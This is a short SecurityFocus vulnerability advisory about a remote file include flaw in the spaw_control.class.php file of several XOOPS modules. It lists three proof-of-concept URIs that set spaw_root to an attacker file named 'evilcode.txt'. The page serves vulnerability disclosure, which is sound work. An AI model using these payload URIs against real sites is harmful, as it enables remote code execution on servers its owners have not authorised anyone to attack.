Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs and exploit code are available:

http://www.example.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt
http://www.example.com/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=evilcode.txt
http://www.example.com/modules/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=evilcode.txt







 

Privacy Statement
Copyright 2009, SecurityFocus